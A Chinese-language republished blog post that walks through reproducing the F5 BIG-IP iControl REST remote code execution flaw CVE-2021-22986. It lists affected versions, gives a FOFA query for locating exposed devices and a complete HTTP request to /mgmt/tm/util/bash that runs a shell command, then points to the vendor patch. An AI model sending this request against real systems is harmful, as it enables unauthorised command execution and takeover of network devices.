怎么实现F5 BIG-IP 远程代码执行漏洞CVE-2021-22986复现
发表于:2024-12-05 作者:千家信息网编辑
千家信息网最后更新 2024年12月05日,这篇文章给大家介绍怎么实现F5 BIG-IP 远程代码执行漏洞CVE-2021-22986复现,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。F5 BIG-IPF5 BIG-IP
千家信息网最后更新 2024年12月05日怎么实现F5 BIG-IP 远程代码执行漏洞CVE-2021-22986复现
这篇文章给大家介绍怎么实现F5 BIG-IP 远程代码执行漏洞CVE-2021-22986复现,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。
F5 BIG-IP
F5 BIG-IP 链路控制器用于最大限度提升链路性能与可用性的下一代广域网链路流量管理。
漏洞简介
F5 BIG-IP 存在代码执行漏洞,该漏洞允许定义身份验证的攻击者通过 BIG-IP 管理界面和自身IP地址对 iControl REST 接口进行网络访问,以执行任意系统命令,控制目标机器。
影响版本
F5 BIG-IP 16.0.0-16.0.1
F5 BIG-IP 15.1.0-15.1.2
F5 BIG-IP 14.1.0-14.1.3.1
F5 BIG-IP 13.1.0-13.1.3.5
F5 BIG-IP 12.1.0-12.1.5.2
F5 BIG-IQ 7.1.0-7.1.0.2
F5 BIG-IQ 7.0.0-7.0.0.1
F5 BIG-IQ 6.0.0-6.1.0
漏洞复现
fofa搜索关键词:
body="F5 Networks, Inc"
打开首页如下:
构造请求数据包,执行任意命令:
POST /mgmt/tm/util/bash HTTP/1.1Host: 192.168.1.123:8443Connection: closeContent-Length: 39Cache-Control: max-age=0Authorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token: Upgrade-Insecure-Requests: 1Content-Type: application/json{"command":"run","utilCmdArgs":"-c id"}
修复建议
F5官方已发布相关安全更新,广大用户需及时更新到最新版本。
下载链接:
https://support.f5.com/csp/article/K02566623
关于怎么实现F5 BIG-IP 远程代码执行漏洞CVE-2021-22986复现就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
漏洞
代码
链路
内容
命令
更多
版本
帮助
控制
更新
管理
不错
最大
安全
下一代
关键
关键词
兴趣
可用性
地址
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
中国数据库发展图s
php服务器安全面试题
南瑞软件开发招聘
南昌游戏软件开发公司有哪些
微立邦网络技术有限公司
数据库技术考试大纲
规划软件开发
数据库字段的类型
软件开发好创业吗
网络安全大赛官方网
宽城区网络技术有哪些
新冠疫苗数据库设计
中央网信办网络安全管理
淘宝分享服务器出错了
node数据库分析
linux 服务器比较
泾县自动化软件开发服务哪个好
镜像服务器设置
青岛科技大学移动互联网方向
三农数据库简介在互联网时代
上海市网络安全信息中心
关于网络安全个人隐私的作文
金融网络安全宣传内容
登录id服务器出问题是什么原因
黄岛区微信小程序软件开发系统
方舟哪个服务器能升100级
自学手机app软件开发
安卓数据库sqlite视频
机械转行网络安全
远程服务器怎么看内存泄漏